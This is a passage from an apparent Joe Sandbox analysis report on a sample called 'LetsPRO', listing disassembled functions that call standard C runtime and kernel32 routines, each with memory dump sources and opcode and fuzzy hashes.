                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C92938E
                                        • _errno.MSVCR100(?), ref: 6C92939B
                                        • _invalid_parameter_noinfo.MSVCR100(?), ref: 6C9293A6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo
                                        • String ID: B
                                        • API String ID: 2959964966-1255198513
                                        • Opcode ID: 6974be05800ae278215a632e5f284c7275e9fa6b75bdaf49c7eb701bdbec58ca
                                        • Instruction ID: 328647e63064998a2a8c17655bd0855d9ef41904a395bad5365a69b8b255c3e5
                                        • Opcode Fuzzy Hash: 6974be05800ae278215a632e5f284c7275e9fa6b75bdaf49c7eb701bdbec58ca
                                        • Instruction Fuzzy Hash: 9E318131A0551DDFDF009FA8C8844EEB7B8FF19328F15062EEA60A3AD1D779D5058BA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C904645 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 81COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo
                                        • String ID: B
                                        • API String ID: 2959964966-1255198513
                                        • Opcode ID: 1234c5f896610d5cf87850d161ef2958a2b00a23cc67fc54cef159a4d38bea26
                                        • Instruction ID: 66f34affd5007e677105c2c585c4c24866ce9b1bb543608bc72b9bde6eebe561
                                        • Opcode Fuzzy Hash: 1234c5f896610d5cf87850d161ef2958a2b00a23cc67fc54cef159a4d38bea26
                                        • Instruction Fuzzy Hash: D521B572E0111DDFDF108F94CC805EE77B8FB25328F10022AE920A7690EB35C8158BA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C901ABD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 80COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo
                                        • String ID: B
                                        • API String ID: 2959964966-1255198513
                                        • Opcode ID: 746934311497ab62f61339c9e4c1a7ac3d8c7773d5ca8268d3ff9410dcc80627
                                        • Instruction ID: e9fa5a9d0693264c611b17e29c19a3a7c641a733fb90afd0f8c8a6f42be1cfa8
                                        • Opcode Fuzzy Hash: 746934311497ab62f61339c9e4c1a7ac3d8c7773d5ca8268d3ff9410dcc80627
                                        • Instruction Fuzzy Hash: B4219772A0011DDFDF005F94CC805EE77B4FF1A328B15051AE520A7AA4D735D4058BA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C914DDD Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 77COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: NameName::
                                        • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                        • API String ID: 1333004437-2211150622
                                        • Opcode ID: 4b45ecc307f1188ffde0b500370456b902843e668ce0b6e11b7be83bff2dc4cc
                                        • Instruction ID: 7a3c0336787d05cc33262b6206f7f8b1a1e28fd35329441b36d667480cb4263e
                                        • Opcode Fuzzy Hash: 4b45ecc307f1188ffde0b500370456b902843e668ce0b6e11b7be83bff2dc4cc
                                        • Instruction Fuzzy Hash: BB2159323196489FCB01CF98D4419AD3BF8EF4A79DB648195E885ABB15DB34D902CF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C913A6F Relevance: 12.2, APIs: 8, Instructions: 214stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • strncpy_s.MSVCR100(?,00000003,?,00000002), ref: 6C913B01
                                        • _ismbblead.MSVCR100(00000001), ref: 6C913B20
                                        • strncpy_s.MSVCR100(?,?,?,?), ref: 6C913B74
                                        • strncpy_s.MSVCR100(?,?,?,?), ref: 6C913BA9
                                        • _errno.MSVCR100 ref: 6C930FC3
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C930FD2
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: strncpy_s$_errno_invalid_parameter_noinfo_ismbblead
                                        • String ID:
                                        • API String ID: 519590025-0
                                        • Opcode ID: 85bb507173621e1a4525b74ec89be9cccdc24d122ab0f7e4d4b7746af140b4a2
                                        • Instruction ID: 1a9105e68129d6951bf2eb64c2e79f0e2a5049facffe43715f2f92935c654ee9
                                        • Opcode Fuzzy Hash: 85bb507173621e1a4525b74ec89be9cccdc24d122ab0f7e4d4b7746af140b4a2
                                        • Instruction Fuzzy Hash: 5A71A331949A9CDFCF128E288D416ED3BB9BB45748F34225AE86897D14E332C994CB81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C905D19 Relevance: 12.2, APIs: 8, Instructions: 211COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a0c293bb4a7705d562b928e09b8f339382f9a22b2a1c4973c20c709af4f67277
                                        • Instruction ID: c195b84f40961a98c8cb39261eaeb840d2961fe27e08b0bf632085ad5444344c
                                        • Opcode Fuzzy Hash: a0c293bb4a7705d562b928e09b8f339382f9a22b2a1c4973c20c709af4f67277
                                        • Instruction Fuzzy Hash: 2871B372A1114ADFDF10CF94C894DEEBBB9FF05318B14056EE1A1A7958DB35C940CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C97D809 Relevance: 12.2, APIs: 8, Instructions: 208COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _ismbblead.MSVCR100(00000001,?,?,?,?,?,6C97DA48,?,?,?,?,?,?,?,?,?), ref: 6C97D8C0
                                        • __cftof.LIBCMT(00000000,000000FF,?,?,?,?,?,?,?,6C97DA48,?,?,?,?,?,?), ref: 6C97D909
                                        • __cftof.LIBCMT(?,000000FF,?,?,?,?,?,?,?,6C97DA48,?,?,?,?,?,?), ref: 6C97D945
                                        • __cftof.LIBCMT(?,000000FF,?,?,?,?,?,?,?,6C97DA48,?,?,?,?,?,?), ref: 6C97D962
                                        • __cftof.LIBCMT(?,000000FF,?,?,?,?,?,?,?,6C97DA48,?,?,?,?,?,?), ref: 6C97D982
                                        • _errno.MSVCR100(?,?,?,?,?,6C97DA48,?,?,?,?,?,?,?,?,?), ref: 6C97D9DB
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,6C97DA48,?,?,?,?,?,?,?,?,?), ref: 6C97D9EA
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __cftof$_errno_invalid_parameter_noinfo_ismbblead
                                        • String ID:
                                        • API String ID: 2528209487-0
                                        • Opcode ID: d121932c2241aa280c719d4f602c558b646f9e7d4dc17766c4679811aa389d1a
                                        • Instruction ID: 16fb0ac7553be5c830138e1b10916740b362272e18b413c33a87a7dfafc8736a
                                        • Opcode Fuzzy Hash: d121932c2241aa280c719d4f602c558b646f9e7d4dc17766c4679811aa389d1a
                                        • Instruction Fuzzy Hash: 0D71B533907645DBDF328F29C8403D97BA9EF95758F34029AE8A856B44E371C981CBB1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C95FD23 Relevance: 12.2, APIs: 8, Instructions: 173COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _errno.MSVCR100(?,?,?,00000000,00000001,6C9A7C68), ref: 6C95FD3D
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?,00000000,00000001,6C9A7C68), ref: 6C95FD48
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • _errno.MSVCR100(00000000,?,?,?,00000000,00000001,6C9A7C68), ref: 6C95FD69
                                        • _invalid_parameter_noinfo.MSVCR100(00000000,?,?,?,00000000,00000001,6C9A7C68), ref: 6C95FD74
                                        • __stricmp_l.LIBCMT(00000001,00000000,?,00000000,?,?,?,00000000,00000001,6C9A7C68), ref: 6C95FD9E
                                          • Part of subcall function 6C970FC5: _errno.MSVCR100(?,00000000,?,00000000,00000000,00000005), ref: 6C970FE0
                                          • Part of subcall function 6C970FC5: _invalid_parameter_noinfo.MSVCR100(?,00000000,?,00000000,00000000,00000005), ref: 6C970FEB
                                        • __crtLCMapStringA.MSVCR100(?,00000000,00000200,00000001,00000002,6C9A7C68,00000002,?,00000001,?,?,00000000,?,?,?,00000000), ref: 6C95FDF4
                                        • __crtLCMapStringA.MSVCR100(?,00000000,00000200,00000001,00000002,6C9A7C68,00000002,?,00000001,?,?,?,?,?,?,?), ref: 6C95FE75
                                        • _errno.MSVCR100(?,?,?,?,?,?,?,00000000,?,?,?,00000000,00000001,6C9A7C68), ref: 6C95FED2
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$_invalid_parameter_noinfo$String__crt$__stricmp_l_invalid_parameter
                                        • String ID:
                                        • API String ID: 2295373847-0
                                        • Opcode ID: c6bef12b193cd357e67a0a2f2bcd3b1d31eeb466c669d0dc8619482a185a6827
                                        • Instruction ID: 06705d4ae5ca270311a42fae1f220420524933848a363bd1415b93f5e8cb5d8c
                                        • Opcode Fuzzy Hash: c6bef12b193cd357e67a0a2f2bcd3b1d31eeb466c669d0dc8619482a185a6827
                                        • Instruction Fuzzy Hash: F6513B71E042899BDB15CB68C484BED7BF4AF0233CF684299E4B19B9D2C771CA65C750
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9482F9 Relevance: 12.1, APIs: 8, Instructions: 111synchronizationthreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,F3B6147F), ref: 6C94833B
                                        • GetLastError.KERNEL32 ref: 6C948349
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C948362
                                        • _CxxThrowException.MSVCR100(?,6C9A0D48,00000000), ref: 6C948371
                                        • _memset.LIBCMT(?,00000000,0000000C), ref: 6C9483D7
                                        • SetThreadPriority.KERNEL32(?,?,?), ref: 6C94840B
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C948417
                                        • CloseHandle.KERNEL32(00000000), ref: 6C948428
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CloseConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventExceptionHandleLastObjectPrioritySingleThreadThrowWait_memset
                                        • String ID:
                                        • API String ID: 1332095174-0
                                        • Opcode ID: 60ad1e5abe6504e69a1c1e7dae444d6bea9a08987802fd7c8d8bd57f4fc4a442
                                        • Instruction ID: 6efdb356e2be26bbd50ed377094fcd7540b236027f3cb8f47ede99a81645b795
                                        • Opcode Fuzzy Hash: 60ad1e5abe6504e69a1c1e7dae444d6bea9a08987802fd7c8d8bd57f4fc4a442
                                        • Instruction Fuzzy Hash: 5E419171604611AFC714CF24DC44E9ABBE8FF49768F104A2AF465D3AA0DB34E944CBC5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90CDC4 Relevance: 12.1, APIs: 8, Instructions: 103COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _fileno.MSVCR100(?,?,?,?,?,6C9130F1,?), ref: 6C90CE0D
                                        • _read.MSVCR100(00000000,?,?,?,?,6C9130F1,?), ref: 6C90CE14
                                        • _fileno.MSVCR100(?), ref: 6C90CE37
                                        • _fileno.MSVCR100(?), ref: 6C90CE47
                                        • _fileno.MSVCR100(?), ref: 6C90CE58
                                        • _fileno.MSVCR100(?,?), ref: 6C90CE68
                                        • _errno.MSVCR100(?,?,6C9130F1,?), ref: 6C92875C
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,6C9130F1,?), ref: 6C928767
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _fileno$_errno_invalid_parameter_noinfo_read
                                        • String ID:
                                        • API String ID: 2022966298-0
                                        • Opcode ID: 571609bf9e75ebaa1040fe8f3cd9cc6ec0e1efa56dd421e26dafd731a373bf36
                                        • Instruction ID: 40b60dc23da0b1d95b26ca5139ec9bd0c938c466047b94594898f99c85614dd5
                                        • Opcode Fuzzy Hash: 571609bf9e75ebaa1040fe8f3cd9cc6ec0e1efa56dd421e26dafd731a373bf36
                                        • Instruction Fuzzy Hash: B3314832119B008ED3205F25C405B9B77E8EF2372CF308A1DD8F696E90DB34E5558B95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9042A7 Relevance: 12.1, APIs: 8, Instructions: 103COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _errno.MSVCR100(?,?,6C9042D5,?), ref: 6C9287AA
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,6C9042D5,?), ref: 6C9287B5
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 2959964966-0
                                        • Opcode ID: 6685edf244d787a1540bee02662a68c3ee5c83281d612d2bd0cc7718606ad360
                                        • Instruction ID: dcf58730416946763f639730988b39ac22f4ff02b0020fefb50df861d66be91d
                                        • Opcode Fuzzy Hash: 6685edf244d787a1540bee02662a68c3ee5c83281d612d2bd0cc7718606ad360
                                        • Instruction Fuzzy Hash: C631F733565B018ED3244F29D840B9A77A8EF6373CB248A1ED4F586ED4DB3CE1418B88
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C916DC4 Relevance: 12.1, APIs: 8, Instructions: 100COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000001,00000000,00000001,00000002,?,?,00000000,?,?,?,6C916D8C,?,?,6C916DA8,00000010), ref: 6C916E2E
                                        • _get_osfhandle.MSVCR100(?,00000000,?,?,?,6C916D8C,?,?,6C916DA8,00000010), ref: 6C916E38
                                        • GetCurrentProcess.KERNEL32(00000000,00000000,?,?,?,6C916D8C,?,?,6C916DA8,00000010), ref: 6C916E3F
                                        • DuplicateHandle.KERNEL32(00000000,?,?,?,6C916D8C,?,?,6C916DA8,00000010), ref: 6C916E46
                                          • Part of subcall function 6C90A6FA: _get_osfhandle.MSVCR100(?,?,?,?,6C90A7D5,?,6C90A7F0,00000010), ref: 6C90A705
                                          • Part of subcall function 6C90A6FA: _get_osfhandle.MSVCR100(?), ref: 6C90A728
                                          • Part of subcall function 6C90A6FA: CloseHandle.KERNEL32(00000000), ref: 6C90A72F
                                        • _errno.MSVCR100(?,00000000,?,?,?,6C916D8C,?,?,6C916DA8,00000010), ref: 6C9305A0
                                        • __doserrno.MSVCR100(?,00000000,?,?,?,6C916D8C,?,?,6C916DA8,00000010), ref: 6C9305AB
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _get_osfhandle$CurrentHandleProcess$CloseDuplicate__doserrno_errno
                                        • String ID:
                                        • API String ID: 4219055303-0
                                        • Opcode ID: e9ccfb456a1a92393b461cce06e517b8ef4ff19647a23e0287bca4944f1010e5
                                        • Instruction ID: bf4beae7478b2709339e3b65e86c9c472fecc5135795c0e08de1c1fcb0934496
                                        • Opcode Fuzzy Hash: e9ccfb456a1a92393b461cce06e517b8ef4ff19647a23e0287bca4944f1010e5
                                        • Instruction Fuzzy Hash: D4312935618685AFDB01CF78C884F953BF5EF1A318F115299E814CFAA1DB71E944CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9109CA Relevance: 12.1, APIs: 8, Instructions: 99COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __crtCompareStringW.MSVCR100(?,00001001,00000000,?,?,?,?), ref: 6C915FFC
                                        • _errno.MSVCR100 ref: 6C92C79B
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C92C7A6
                                        • _errno.MSVCR100 ref: 6C92C7B5
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C92C7C0
                                        • _errno.MSVCR100 ref: 6C92C7CF
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C92C7DA
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo$CompareString__crt
                                        • String ID:
                                        • API String ID: 380063240-0
                                        • Opcode ID: 717027d97cf7a6e3c3fd8312fa96299b366608f9cd107c798850030c7963a2ce
                                        • Instruction ID: 239e3ca305e363b08dc0c2ac9ce05dbafb80d881835bb97892d4086eb5424a4f
                                        • Opcode Fuzzy Hash: 717027d97cf7a6e3c3fd8312fa96299b366608f9cd107c798850030c7963a2ce
                                        • Instruction Fuzzy Hash: 9A315A3160518DDBEB106E68C8857BE36ECBF22728F201252E4F0DBED5DB36C85083A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C912124 Relevance: 12.1, APIs: 8, Instructions: 99COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _mbschr.MSVCR100(00000000,0000003D,00000000,00000000,7591DFF0), ref: 6C91214B
                                          • Part of subcall function 6C91210D: _mbschr_l.MSVCR100(00000000,00000000,00000000,?,6C912150,00000000,0000003D,00000000,00000000,7591DFF0), ref: 6C91211A
                                        • free.MSVCR100(?,?,?,?,?,?,?,?,?), ref: 6C9121B2
                                        • _errno.MSVCR100(00000000,00000000,7591DFF0), ref: 6C9121C4
                                        • _errno.MSVCR100(7591DFF0), ref: 6C931BEB
                                        • _invalid_parameter_noinfo.MSVCR100(7591DFF0), ref: 6C931BF6
                                        • ___wtomb_environ.LIBCMT ref: 6C931C1F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$___wtomb_environ_invalid_parameter_noinfo_mbschr_mbschr_lfree
                                        • String ID:
                                        • API String ID: 679965329-0
                                        • Opcode ID: 983e1ddac5669da851287938f34457817b31a93ff1579b0200b6f2f3b5e6cead
                                        • Instruction ID: b1d460a3dd20efd40bf770ca8dafff94bea5b4836f73997663497feab8a31672
                                        • Opcode Fuzzy Hash: 983e1ddac5669da851287938f34457817b31a93ff1579b0200b6f2f3b5e6cead
                                        • Instruction Fuzzy Hash: 9E31B276A4D659AFCB10EFE898C549C77B4EB53328B31157AD224A7E60DB30C6408FA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C904F9D Relevance: 12.1, APIs: 8, Instructions: 97stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _getptd.MSVCR100(?,?,?,?,?,?,?,6C9050C8,00000014), ref: 6C904FB7
                                          • Part of subcall function 6C905298: _getptd.MSVCR100(6C9052F8,0000000C,6C92A025,?,?,6C9043EA,?), ref: 6C9052A4
                                          • Part of subcall function 6C905298: _lock.MSVCR100(0000000C), ref: 6C9052BB
                                        • _calloc_crt.MSVCR100(000000D8,00000001), ref: 6C904FD7
                                        • _lock.MSVCR100(0000000C), ref: 6C904FED
                                          • Part of subcall function 6C900940: EnterCriticalSection.KERNEL32(00000001,00000001,?,6C901F15,0000000D), ref: 6C90095B
                                        • __copytlocinfo_nolock.LIBCMT ref: 6C904FFB
                                          • Part of subcall function 6C904D82: _unlock.MSVCR100(0000000C,6C905009), ref: 6C904D84
                                          • Part of subcall function 6C9051E2: __expandlocale.LIBCMT ref: 6C90523C
                                          • Part of subcall function 6C9051E2: strcmp.MSVCR100(?,00000048,?,?,?,00000001,00000000,00000000), ref: 6C905258
                                        • strcmp.MSVCR100(00000000,6C9A4BC0), ref: 6C905030
                                        • _lock.MSVCR100(0000000C), ref: 6C905041
                                        • _errno.MSVCR100(?,?,?,?,?,?,?,6C9050C8,00000014), ref: 6C930D00
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,?,6C9050C8,00000014), ref: 6C930D0B
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
